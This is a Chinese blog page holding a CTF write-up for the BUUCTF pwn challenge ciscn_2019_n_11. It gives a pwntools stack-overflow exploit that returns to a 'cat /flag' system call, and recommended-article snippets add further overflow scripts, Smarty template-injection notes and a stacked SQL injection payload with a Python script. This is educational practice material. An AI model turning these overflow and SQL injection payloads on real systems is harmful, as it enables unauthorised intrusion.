buuctf ciscn_2019_n_11

最新推荐文章于 2024-11-29 08:00:00 发布

kids-syc

最新推荐文章于 2024-11-29 08:00:00 发布

阅读量253

点赞数 3

文章标签：网络安全计算机网络

本文链接：https://blog.youkuaiyun.com/m0_74125780/article/details/141567514

版权

首先用checksec检查，是64bit，然后用ida打开。

按tab键打开源码，查看func函数内容，发现有system函数，所以第一步找到cat /flag的地址，0x4006BE

然后gets(v1)函数，我们找到v1的地址0x30，再加上8，因为是64bit，如果是32便加4

接着编写脚本,运行得到flag。

from pwn import *
p = remote('node5.buuoj.cn', 29219)
p.sendline(b'a' * (0x30+8) + p64(0x4006BE))
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kids-syc

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF ciscn_2019_c_1 题解

qq_51802916的博客

08-20

490

这个地方还会涉及到堆栈对齐的问题，有时候POC都构造正确了，但是运行时仍然报段错误，可能就是堆栈没有对齐，这是我们可以加入一条ret指令，改变一下堆栈，例如假如rsp指向了0xff88，这是一个没有对齐的地址，增加ret后就会变成0xff90，这个一个已经对齐的地址，可以正常运行。，这里显然可以进行缓冲区溢出利用，中间的部分是对字符串进行处理，我们不需要看得太仔细，因为可以通过传入\x00字符使循环提前终止，这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址，然后构造POC了。

[BUUCTF]-PWN:ciscn_2019_n_3解析

2301_79326813的博客

01-20

922

堆题，先看保护32位，Partial RELRO，没pie关键信息就那么多，看ida大致就是alloc创建堆块，free释放堆块，dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中，会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试，可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址，我们在free堆块时他都会执行，并且题目给了我们system。

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF刷题之路-ciscn_2019_n_11

qq_30528603的博客

05-27

276

非常简单的逻辑，类似于一个猜数字游戏，猜对了弹出flag，失败了还贴心的告诉你可能值。我们要做的就是修改v2变量的内容，让他等于11.28125。这次我们不需要覆盖返回地址只需要改v2的值就好了。接着我们算一下偏移【rbp-30h-rbp+4h】得到偏移为44个字节。意思就是说我们在44个字节之后填入11.28125覆盖v2的值就能使if语句成立。题目只开启了堆栈不可执行。无非就是不能在栈上执行shellcode无伤大雅。

ciscn_2019_n_1

zip471642048的博客

01-20

359

ciscn_2019_n_1 日常checksec一下，nice 程序是64位然后什么都没有开，非常好 ida64位打开程序，在frame_dummy函数处发现溢出，很明显我们只需溢出到v2把他的值覆盖掉成11.28125就过关了我们可以通过用v1减去v2的值来计算溢出的距离0x30-0x4，然后把11.28125转换成在内存对应的16进制输入就ak了 from pwn import * io = remote('redirect.do-not-trust.hacking.run', 10072)

BUUCTF ciscn_2019_n_1

RookieMOR的博客

05-14

746

1.下载文件，用checksec一下： 2.用IDA64查看，进入func函数：当v2=11.28125时获得flag，但只有v1的输入，没有v2输入。因为有一个gets函数，点击v1，v2可以知道，v1与v2差44个字节，可以通过输入v1的值去改变v2的值，实现栈溢出。查看汇编可以看到有一个uconiss的比较指令，把xmm0与cs:dword_4007F4，由movss可以知道xmme0是v1或v2的值，那么点击dword_4007F4 看到一个 dd ，百度一下可以知道，.

[CISCN 2019华东南]Web11 题解

qq_64222098的博客

04-15

280

它相比较于{php}{/php}不同的是添加了一些特性。每个{if}必须有配对的{/if}，也可以用{else}和{else if},所有的php条件表达式和函数都可以在if内使用，比如||,or,and,&等。看了一下，没有直接给参数让我们来传。但是发现是一个a simp ip address api，猜测可能ip是参数，试一下。在这道题上，我们就可以用{if}标签。因为提示是smarty，于是上网查了一下资料。但是发现它被编码了，不行。发现这个地方变了，成功找到注入的地方。发现版本是3.1的。

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

680

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

BUUCTF—ciscn_2019_n_1 1

qq_41560595的博客

09-24

4719

这道题是栈溢出题型，又不同于一般的栈溢出，在此做个总结。查看权限拖入IDA，F5可用函数解题思路：这道题的意思是输入字符串v1，判断v2。考虑输入长字符串覆盖到存储v2的内存空间，把v2的值改掉。因此，覆盖0x30-0x4=44个字节给v1，另外4个字节给v2 由于v2数值在内存中以16进制存储，所以，找到11.28125的16进制值。存在两个比较指令，双击进去。 0x41348000就是16进制的11.28125。编写脚本 from pwn import * p=remote('

BUUCTF栈迁移ciscn_2019_es_2

Rt1Text的博客

04-09

1136

1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数并没有什么 2.int vul()函数程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作但是shift+f12 这里仅仅是打印flag字符串,没有用同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数但是...

BUUCTF Pwn ciscn_2019_n_1 1

qq_45200829的博客

11-08

452

BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程

【BUUCTF】ciscn_2019_n_1

2201_75556700的博客

11-29

427

4、看到调用了func函数，双击查看，用到了gets函数，存在栈溢出，这里需要判断v2的值等于11.28125，才会执行脚本。3、使用64位的ida分析，找到main函数，F5反汇编。题目二：【BUUCTF】ciscn_2019_n_1。v1数组大小：44字节（0x30-0x04）2、下载附件在kali中分析。

BUUCTF pwn ciscn_2019_s_3(SROP)

菜的只能随便写写博客

02-13

1678

0x01 文件分析 0x02 运行有一个回显，并且还有多余的字符显示，接着看代码分析一下。 0x03 IDA源码由后面的函数可以看出，这个程序使用的系统调用，并且vuln里面存在栈溢出。在程序之中的gadgets存在着两个为rax赋值的gadget，15的系统号是rt_sigreturn，3b的系统调用是execve，利用这两个可以执行系统调用得到shell。 ex...

pwn练习题

WuMing_Z的博客

02-23

2413

程序分析：main函数中只存在system("/bin/sh")函数，所以nc可直接拿到权限）nc指令：远程连接对方服务器，对方服务器有什么程序就会执行什么程序nc（ip + 端口号）例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名，冒号后的29650是端口号（注意冒号要改为空格）然后直接cat flag 即可。

[CISCN 2019华东南]Web11 和[NISACTF 2022]midlevel

Leaf_initial的博客

04-27

749

Smarty是基于PHP开发的，对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道，jinjia2是基于python的，而Smarty是基于PHP的，所以理解起来还是很容易，我们只需要达到命令执行就可以了。

[CISCN 2019华东南]Web11

m0_73612768的博客

12-31

658

PHP Smarty 模板注入；

buuctf习题pwn（2~10）

yw__y的博客

03-30

1384

。

[ciscn 2019] n_1

0of_blog

05-17

210

日常checksec一下，nice 程序是64位然后什么都没有开，非常好 ida64位打开程序，在frame_dummy函数处发现溢出，很明显我们只需溢出到v2把他的值覆盖掉成11.28125就过关了我们可以通过用v1减去v2的值来计算溢出的距离0x30-0x4，然后把11.28125转换成在内存对应的16进制输入就ak了 from pwn import * io = remote('redirect.do-not-trust.hacking.run', 10072) res = 0x4

[CISCN2019 华东南赛区]Web11

m0_62905261的博客

09-01

328

[CISCN2019 华东南赛区]Web11

buuctf eazy_sql

最新发布

04-01

### BUUCTF eazy_sql 解题思路在BUUCTF的`eazy_sql`题目中，主要考察的是SQL注入技巧以及如何通过特定方式绕过过滤机制。以下是针对该题目的详细分析和解决方法。 #### 题目背景此题目属于SQL注入类挑战，目标是从数据库中提取敏感数据（如flag）。已知可以通过设置变量并执行动态SQL语句来完成操作[^1]。具体实现涉及以下几个关键点： 1. **利用MySQL准备语句功能** MySQL支持通过`PREPARE`命令创建可执行的SQL语句对象，并通过`EXECUTE`运行它。这种方式允许攻击者构建复杂的查询逻辑，甚至能够规避某些简单的字符过滤规则。 2. **字符串拼接技术** 如果存在对关键字（例如`SELECT`）的严格过滤，则可以借助`CONCAT()`函数将被拆分的关键字重新组合成合法的SQL语法。这种方法广泛应用于绕过基于正则表达式的防护措施。 3. **实际payload构造** 下面是一个典型的payload示例用于演示上述原理： ```sql 1';SET @sql = concat('sele','ct flag from `1919810931114514`;');PREPARE stmt from @sql;EXECUTE stmt;# ``` 这里先定义了一个名为`@sql`的会话级变量存储最终要被执行的完整SQL指令；接着调用`PREPARE`声明一个新的预处理语句实例命名为`stmt`；最后一步就是真正触发整个流程获取期望的结果集。 #### 扩展思考——其他可能的方向除了直接尝试标准形式外，还可以探索更多潜在路径进一步巩固理解程度。比如参考另一个平台上的相似案例分享，在那里提到访问隐藏文件或许也是解锁谜底的重要线索之一[^3]。 --- ### 示例代码片段展示为了更直观地说明问题所在及其解决方案，下面给出一段模拟环境下的Python脚本作为辅助工具供学习交流之用： ```python import requests url = 'http://example.com/vulnerable_page' data = { 'input': "1';SET @sql = concat('sele','ct database()');PREPARE stmt FROM @sql;EXECUTE stmt;#" } response = requests.post(url, data=data) if response.status_code == 200: print("[+] Request successful!") else: print(f"[-] Failed with status code {response.status_code}") ``` > 注：以上仅为理论探讨用途，请勿非法入侵任何真实系统！ ---